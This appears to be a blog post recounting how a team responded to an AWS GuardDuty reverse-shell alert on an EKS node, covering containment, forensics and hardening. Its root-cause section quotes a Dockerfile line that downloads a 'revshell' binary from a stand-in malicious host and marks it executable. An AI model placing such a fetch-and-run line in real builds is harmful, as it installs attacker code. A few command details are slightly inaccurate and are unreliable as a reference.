War Story: Recovering From an AWS GuardDuty 2026 Alert for a Compromised EKS Node

#story #recovering #guardduty #2026

War Story: Recovering From an AWS GuardDuty 2026 Alert for a Compromised EKS Node

It was 6:47 PM on a Friday in October 2026 when my pager went off. The alert: AWS GuardDuty had flagged a critical threat for our production EKS cluster, signaling a compromised worker node. What followed was a 4-hour incident response sprint that tested our team’s EKS security posture, incident response playbooks, and ability to stay calm under pressure.

The GuardDuty Alert

GuardDuty’s EKS Protection feature, which we’d enabled earlier that year, had triggered a EKSNodeRuntimeThreat: Suspicious Reverse Shell Execution finding. The alert details pointed to a single worker node in our prod-us-east-1-eks-cluster cluster, part of the ng-prod-worker node group:

Node ID: i-0123456789abcdef0
Suspicious process: /tmp/revshell (MD5 hash matching known malware in GuardDuty’s 2026 threat intel feed)
Outbound connection: 198.51.100.23:4444 (known command-and-control IP)
Abnormal IAM activity: The node’s IAM role had attempted to assume a role in our staging account, a action never logged before for this node.

GuardDuty also noted that the node was running a container image pulled from a public Docker Hub repository, which violated our internal policy of only using images from Amazon ECR.

Initial Containment

We followed our incident response (IR) playbook’s first rule: contain the threat before investigating. For EKS nodes, that meant isolating the node from the cluster and preserving forensic evidence:

Cordon the node to prevent new pods from scheduling: kubectl cordon i-0123456789abcdef0
Drain existing pods (ignoring daemonsets, which are cluster-critical): kubectl drain i-0123456789abcdef0 --ignore-daemonsets --delete-emptydir-data
Take a snapshot of the node’s root EBS volume for post-incident forensics, to avoid destroying evidence by terminating the node immediately.
Terminate the compromised node, triggering the node group’s auto-scaling group to launch a replacement node with the latest EKS-optimized AMI.

Within 22 minutes, the compromised node was isolated, all pods were safely rescheduled to healthy nodes, and a replacement node was online. No customer traffic was impacted thanks to the drain process.

Root Cause Analysis

We mounted the EBS snapshot to a forensic EC2 instance to investigate how the attacker gained access. Key findings:

A developer had deployed a hotfix for a frontend service earlier that day, overriding the image pull policy to use a public Docker Hub image (which contained a malicious layer) to avoid waiting for an ECR image scan. The image’s Dockerfile included a RUN curl -o /tmp/revshell http://malicious-registry.example.com/revshell && chmod +x /tmp/revshell instruction that executed on container startup.
The frontend pod was running as root with no security context, allowing the malicious process to escape the container (via a known 2025 runc vulnerability that we hadn’t patched on the node) and gain host-level access.
The node’s IAM role had overly permissive policies: sts:AssumeRole permissions for all accounts in our organization, which the attacker used to attempt lateral movement to our staging account.

Remediation and Hardening

Once the root cause was identified, we implemented short-term fixes and long-term hardening measures:

Short-Term (Completed Within 24 Hours)

Revoked all active sessions for the compromised node’s IAM role, rotated access keys for any roles the attacker had attempted to assume.
Patched all EKS nodes to the latest EKS-optimized AMI with the runc vulnerability fix, and enabled automatic node group updates.
Scanned all running container images in the cluster using Amazon ECR image scanning, removing any public images and replacing them with ECR-hosted, scanned alternatives.

Long-Term (Completed Within 2 Weeks)

Deployed OPA Gatekeeper as an admission controller to block all pods using non-ECR images, enforcing our image pull policy at the API server level.
Migrated all pod-level IAM access to IAM Roles for Service Accounts (IRSA), removing all sts:AssumeRole permissions from node IAM roles.
Enforced EKS Pod Security Standards (restricted profile) across all namespaces, requiring all pods to run as non-root, with read-only root filesystems, and no privileged access.
Enabled EKS Audit Logging to CloudWatch Logs, and set up CloudWatch alarms for GuardDuty findings, unauthorized API calls, and IAM role assumption attempts.
Updated our IR playbook to include EKS-specific containment steps, and conducted a tabletop exercise with the on-call team to practice the process.

Lessons Learned

This incident reinforced three key lessons for our team:

Never bypass security policies for expediency: the hotfix that caused the breach saved 30 minutes of waiting for an image scan, but cost 4 hours of incident response and put our production environment at risk.
Defense in depth works: GuardDuty caught the threat early, but combining it with admission controllers, pod security standards, and IR playbooks prevented lateral movement and customer impact.
Least privilege is non-negotiable: the node’s IAM role had far more permissions than needed, which could have led to a much worse breach if the attacker had succeeded in assuming the staging account role.

By 11:30 PM that Friday, we’d closed the incident, documented all findings, and started work on hardening measures. The GuardDuty alert had been a wake-up call, but it ultimately made our EKS environment far more secure than it was before.